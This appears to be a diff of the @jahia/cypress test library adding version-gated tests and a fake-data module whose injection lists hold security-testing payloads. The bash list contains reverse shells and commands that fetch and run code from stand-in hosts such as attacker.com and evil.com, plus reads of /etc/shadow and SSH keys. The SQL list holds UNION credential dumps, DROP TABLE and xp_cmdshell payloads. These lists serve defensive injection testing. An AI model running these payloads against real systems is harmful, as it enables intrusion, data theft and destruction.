@jahia/cypress 7.4.0 → 8.1.0

package/CHANGELOG.md

@@ -0,0 +1,35 @@
+# @jahia/cypress Changelog
+
+## 8.1.0
+
+### New Features
+
+* Add `it.since()` and `describe.since()` modifiers to gate tests by Jahia version (#216)
+
+* Add jfaker library for generating test strings containing human-readable or injections data (#202)
+
+* Improve cypress logs of script execution, now groovy / provisioning and graphql calls provides more information (#214)
+
+### Bug Fixes
+
+* Add browser helpers for printing out auxiliary information about cookies and storages for debugging purposes (#215)
+
+## 8.0.0
+
+### Breaking Changes
+
+* Bump "typescript" from 4.3.5 to 5.9.3; update dependencies accordingly; (#203)
+
+### New Features
+
+* Add copyNode helper (#196)
+
+* Leverage Buildx cache when building Docker test image (#191)
+
+  Use Docker Buildx with the GitHub Actions Cache (if enabled with `DOCKER_BUILD_CACHE_ENABLED` env variable), to speed up the build of the Docker test image (done with `ci.build.sh`)
+
+### Bug Fixes
+
+* Fix broken copyNode helper
+
+  CopyNode (#198)

package/README.md

@@ -22,6 +22,10 @@
 
 [`.repeatUntil()`](./src/support/repeatUntil.md)
 
+[`it.since()`](#version-gated-tests)
+
+[`describe.since()`](#version-gated-tests)
+
 ## Page / component objects
 
 In Page Object Model, a set of object is provided to handle known and reused web elements. 
@@ -100,11 +104,74 @@ module.exports = (on, config) => {
     return config;
 };
 ```
+
+## Version-gated tests
+
+After enabling `modSince` via `registerSupport`, you can gate tests and suites by Jahia version with:
+- `it.since(requiredVersion, title, testFn)`
+- `describe.since(requiredVersion, title, suiteFn)`
+
+Modifiers are supported as well:
+- `it.only.since(...)`, `describe.only.since(...)`
+- `it.skip.since(...)`, `describe.skip.since(...)`
+
+`it.since(...)` and `describe.since(...)` run only when current Jahia version is greater than or equal to `requiredVersion`; otherwise they are skipped.
+
+`it.skip.since(...)` and `describe.skip.since(...)` are always skipped (same behavior as Cypress `skip`, with a version argument for consistency).
+
+Jahia version is fetched in a root `before()` hook and stored in environment variable `CYPRESS_JAHIA_VERSION`.
+```typescript
+it.since('8.2.0', 'shows the new dashboard widget', () => {
+    // test body
+});
+
+describe.since('8.2.0', 'dashboard suite available since 8.2', () => {
+    it('renders the widget list', () => {
+        // suite test body
+    });
+});
+
+// `only` modifiers are also supported
+it.only.since('8.2.0', 'focused version-gated test', () => {
+    // test body
+});
+
+describe.only.since('8.2.0', 'focused version-gated suite', () => {
+    it('runs suite tests', () => {
+        // suite test body
+    });
+});
+
+// `skip` modifiers are also supported
+it.skip.since('8.2.0', 'always skipped version-gated test', () => {
+    // skipped
+});
+
+describe.skip.since('8.2.0', 'always skipped version-gated suite', () => {
+    it('is skipped', () => {
+        // skipped
+    });
+});
+```
+
+## Internal Auxiliary Libraries
+
+### Extended Logger Module
+Helper utility designed to enhance Cypress test logging capabilities by providing structured log levels and decorating log messages with appropriate severity indicators. It enables developers to create more organized and filterable test output by categorizing log messages into different levels. Read more [here](./docs/extended-logger.md).
+
+### JavaScript Errors Logger
+Comprehensive monitoring and reporting module for JavaScript errors and warnings in Cypress tests. It provides automated detection, collection, and reporting of console errors and warnings that occur during test execution, helping maintain code quality and identify issues early in the development process. Read more [here](./docs/js-errors-logger.md).
+
+### jFaker - Fake Data Generation Module
+Flexible fake data generation utility for Cypress testing that combines the power of Faker.js with security-focused injection payload generation. It provides a unified API to generate both realistic test data and security testing payloads (XSS, SQL injection, etc.) through a dynamic proxy-based interface. Read more [here](./docs/jfaker.md).
+
 ## Open-Source
 
 This is an Open-Source codebase, you can find more details about Open-Source @ Jahia [in this repository](https://github.com/Jahia/open-source)
 
 ## How to release
-Ensure and eventually change the version in [package.json](package.json) to match the version to release.
 
-From Github release panel, draft a new release with a tag named `vX.Y.Z` and a title `vX.Y.Z`. The release will be published to NPM automatically.
+Releases are now semi-automated using [Chachalog](https://github.com/GauBen/chachalog). To create a new release:
+
+- Merge the `chore: release` PR from `github-actions`.
+- From Github release panel, draft a new release with a tag named `vX.Y.Z` (use the same version as the one set by Chachalog in the `chore: release` PR) and a title `vX.Y.Z`. The release will be published to NPM automatically.

package/dist/index.js

@@ -1,7 +1,11 @@
 "use strict";
 var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {
     if (k2 === undefined) k2 = k;
-    Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } });
+    var desc = Object.getOwnPropertyDescriptor(m, k);
+    if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {
+      desc = { enumerable: true, get: function() { return m[k]; } };
+    }
+    Object.defineProperty(o, k2, desc);
 }) : (function(o, m, k, k2) {
     if (k2 === undefined) k2 = k;
     o[k2] = m[k];
@@ -9,7 +13,7 @@ var __createBinding = (this && this.__createBinding) || (Object.create ? (functi
 var __exportStar = (this && this.__exportStar) || function(m, exports) {
     for (var p in m) if (p !== "default" && !Object.prototype.hasOwnProperty.call(exports, p)) __createBinding(exports, m, p);
 };
-exports.__esModule = true;
+Object.defineProperty(exports, "__esModule", { value: true });
 __exportStar(require("./page-object"), exports);
 __exportStar(require("./plugins"), exports);
 __exportStar(require("./support"), exports);

package/dist/injections/bash-data.d.ts

@@ -0,0 +1 @@
+export declare const bashData: string[];

package/dist/injections/bash-data.js

@@ -0,0 +1,57 @@
+"use strict";
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.bashData = void 0;
+exports.bashData = [
+    '--version',
+    '--help',
+    '$USER',
+    '/dev/null; touch /tmp/blns.fail ; echo',
+    '`touch /tmp/blns.fail`',
+    '$(touch /tmp/blns.fail)',
+    '@{[system \'touch /tmp/blns.fail\']}',
+    'eval(\'puts \'hello world\'\')',
+    'System(\'ls -al /\')',
+    '`ls -al /`',
+    'Kernel.exec(\'ls -al /\')',
+    'Kernel.exit(1)',
+    '%x(\'ls -al /\')',
+    '$HOME',
+    '$ENV{\'HOME\'}',
+    '%d',
+    '%s',
+    '{0}',
+    '%*.*s',
+    '../../../../../../../../../../../etc/passwd%00',
+    '../../../../../../../../../../../etc/hosts',
+    '() { 0; }; touch /tmp/blns.shellshock1.fail;',
+    '() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }',
+    '; cat /etc/passwd',
+    '| ls -la',
+    '&& whoami',
+    '; rm -rf /tmp/test',
+    '` cat /etc/shadow `',
+    '| id',
+    '; uname -a',
+    '&& cat /etc/group',
+    '$(whoami)',
+    '`id`',
+    '; nc -e /bin/sh attacker.com 4444',
+    '| curl http://malicious.com/shell.sh | bash',
+    '; wget http://evil.com/backdoor -O /tmp/backdoor',
+    '&& chmod +x /tmp/exploit',
+    '`cat /root/.ssh/id_rsa`',
+    '; find / -name \'*.conf\'',
+    '| grep -r \'password\' /etc/',
+    '&& env',
+    '$(cat /proc/version)',
+    '; ps aux',
+    '| netstat -tuln',
+    '&& iptables -L',
+    '`cat /var/log/auth.log`',
+    '; history',
+    '| tail -f /var/log/syslog',
+    '&& crontab -l',
+    '; echo \'* * * * * /tmp/backdoor\' | crontab -',
+    '`sudo su -`',
+    '; python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\''
+];

package/dist/injections/chars-data.d.ts

@@ -0,0 +1 @@
+export declare const charsData: string[];

package/dist/injections/chars-data.js

@@ -0,0 +1,25 @@
+"use strict";
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.charsData = void 0;
+exports.charsData = [
+    ',./;3[]\\-=',
+    '!@#$%^&*()`~',
+    'Ω≈ç√∫˜µ≤≥÷',
+    'åß∂ƒ©˙∆˚¬…æ',
+    'œ∑´®†¥¨ˆøπ“‘',
+    '¡™£¢∞§¶•ªº–≠',
+    '¸˛Ç◊ı˜Â¯˘¿',
+    'ÅÍÎÏ˝ÓÔÒÚÆ☃',
+    '`⁄€‹›fifl‡°·‚—±',
+    '⅛⅜⅝⅞',
+    'ЁЂЃЄЅІЇЈЉЊЋЌЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя',
+    '٠١٢٣٤٥٦٧٨٩',
+    '⁰⁴⁵₀₁₂⁰⁴⁵₀₁₂',
+    'ヽ༼ຈل͜ຈ༽ﾉ',
+    '__ﾛ(,_,*)',
+    '･(≧∀≦)･:*:',
+    '､｡･:*:･ﾟ( ☻  ☻ )･:*:･ﾟ',
+    '(╯°□°）╯︵ ┻━┻',
+    '(ง益ง)งﾃﾞﾃﾞﾝ',
+    '( ͡° ͜ʖ ͡°)'
+];

package/dist/injections/htmlentities-data.d.ts

@@ -0,0 +1 @@
+export declare const htmlentitiesData: string[];

package/dist/injections/htmlentities-data.js

@@ -0,0 +1,22 @@
+"use strict";
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.htmlentitiesData = void 0;
+exports.htmlentitiesData = [
+    '\' - '',
+    '< - &lt;',
+    '> - &gt;',
+    '® - &reg;',
+    '& - &amp;',
+    '$ - &dollar;',
+    '´ - &acute;',
+    '© - &copy;',
+    'À - &Agrave;',
+    'Á - &Aacute;',
+    '- &Acirc;',
+    'Ã - &Atilde;',
+    'Ä - &Auml;',
+    'Å - &Aring',
+    'Æ - &AElig;',
+    'à - a&#768;',
+    'á - a&#769;'
+];

package/dist/injections/numbers-data.d.ts

@@ -0,0 +1 @@
+export declare const numbersData: string[];

package/dist/injections/numbers-data.js

@@ -0,0 +1,66 @@
+"use strict";
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.numbersData = void 0;
+exports.numbersData = [
+    '$1.00',
+    '1/2',
+    '1E2',
+    '1E02',
+    '1E+02',
+    '-1',
+    '-1.00',
+    '-$1.00',
+    '-1/2',
+    '-1E2',
+    '-1E02',
+    '-1E+02',
+    '1/0',
+    '0/0',
+    '-2147483648/-1',
+    '-9223372036854775808/-1',
+    '0.00',
+    '0..0',
+    '0.0.0',
+    '0,00',
+    '0,,0',
+    '0,0,0',
+    '0.0/0',
+    '1.0/0.0',
+    '1,0/0,0',
+    '0,0/0,0',
+    '--1',
+    '-',
+    '-.',
+    '-,',
+    '999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999',
+    'NaN',
+    'Infinity',
+    '-Infinity',
+    'INF',
+    '1#INF',
+    '-1#IND',
+    '1#QNAN',
+    '1#SNAN',
+    '1#IND',
+    '0x0',
+    '0xffffffff',
+    '0xffffffffffffffff',
+    '0xabad1dea',
+    '123456789012345678901234567890123456789',
+    '1,000.00',
+    '1 000.00',
+    '1\'000.00',
+    '1,000,000.00',
+    '1 000 000.00',
+    '1\'000\'000.00',
+    '1.000,00',
+    '1 000,00',
+    '1\'000,00',
+    '1.000.000,00',
+    '1 000 000,00',
+    '1\'000\'000,00',
+    '01000',
+    '08',
+    '09',
+    '2.2250738585072011e-308'
+];

package/dist/injections/sql-data.d.ts

@@ -0,0 +1 @@
+export declare const sqlData: string[];

package/dist/injections/sql-data.js

@@ -0,0 +1,82 @@
+"use strict";
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.sqlData = void 0;
+exports.sqlData = [
+    'select * from "Jahia"."Users" order by "ID"',
+    '1;DROP TABLE users',
+    '1\'; DROP TABLE users-- 1',
+    '\' OR 1=1 -- 1',
+    '\' OR \'1\'=\'1',
+    '\' OR \'1\'=\'1\' --',
+    '\' OR \'1\'=\'1\' /*',
+    'admin\' --',
+    '\' UNION SELECT NULL--',
+    '1\'; DROP TABLE users--',
+    '\' or 1=1--',
+    '" or 1=1--',
+    'or 1=1--',
+    '\' or \'x\'=\'x',
+    '" or "x"="x',
+    '\') or (\'x\'=\'x',
+    '\' or 1=1#',
+    '" or 1=1#',
+    'or 1=1#',
+    '\' OR \'1',
+    '\' OR 1 -- -',
+    '" OR "" = "',
+    '" OR 1 = 1 -- -',
+    '\' OR \'\' = \'',
+    '\'=\'',
+    '\'LIKE\'',
+    '\'=0--+',
+    ' OR 1=1',
+    '\' OR \'x\'=\'x',
+    '\' AND id IS NULL; --',
+    '\'\'\'\'\'\'\'\'\'\'\'\'\'UNION SELECT \'2',
+    '%00',
+    '/*…*/ UNION SELECT/*…*/',
+    '+UNION+SELECT+',
+    '+ UNION+SELECT+',
+    '+UNION+ALL+SELECT+',
+    '||6',
+    '\'||\'6',
+    '(||6)',
+    '\' OR 1=1--',
+    'OR 1=1',
+    '\' OR \'1\'=\'1',
+    'OR \'1\'=\'1\'',
+    '\' OR 1=1 or \'\'=\'',
+    '" OR 1=1 or ""="',
+    '1\' UNION SELECT NULL, NULL--',
+    '1\' UNION ALL SELECT NULL, NULL--',
+    '\' UNION SELECT NULL, username, password FROM users--',
+    '\' UNION SELECT NULL, table_name FROM information_schema.tables--',
+    '\' UNION SELECT NULL, column_name FROM information_schema.columns--',
+    'admin\'--',
+    'admin\' #',
+    'admin\'/*',
+    '\' or 1=1 limit 1 --',
+    '\'="',
+    '\' AND 1=0 UNION ALL SELECT \'\', \'81dc9bdb52d04dc20036dbd8313ed055',
+    '" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055',
+    '\' UNION SELECT NULL, \'admin\', \'5f4dcc3b5aa765d61d8327deb882cf99',
+    '\'; EXEC xp_cmdshell(\'dir\') --',
+    '\'; EXEC sp_configure \'show advanced options\', 1 --',
+    '\'; DROP TABLE users; --',
+    '\'; WAITFOR DELAY \'00:00:05\' --',
+    '\' AND 1=CONVERT(int, (SELECT @@version)) --',
+    '\' UNION SELECT NULL, NULL, NULL, @@version --',
+    '\' AND 1=2 UNION SELECT NULL, load_file(\'/etc/passwd\') --',
+    '\' INTO OUTFILE \'/tmp/out.txt',
+    '\'; SELECT * FROM information_schema.tables --',
+    '\' AND extractvalue(1,concat(0x7e,database())) --',
+    '\' AND updatexml(1,concat(0x7e,version()),1) --',
+    '\' AND (SELECT * FROM (SELECT(SLEEP(5)))a) --',
+    '\' UNION SELECT NULL, group_concat(table_name) FROM information_schema.tables WHERE table_schema=database() --',
+    '\' UNION SELECT NULL, group_concat(column_name) FROM information_schema.columns WHERE table_name=\'users\' --',
+    '\' UNION SELECT username, password FROM users WHERE \'1\'=\'1',
+    '1\' AND 1=2 UNION SELECT NULL, database() --',
+    '1\' AND 1=2 UNION SELECT NULL, user() --',
+    '\'; EXECUTE IMMEDIATE \'SELECT * FROM dual\' --',
+    '\' OR 1=1; BEGIN EXECUTE IMMEDIATE \'SELECT banner FROM v$version\'; END; --'
+];

package/dist/injections/xss-data.d.ts

@@ -0,0 +1 @@
+export declare const xssData: string[];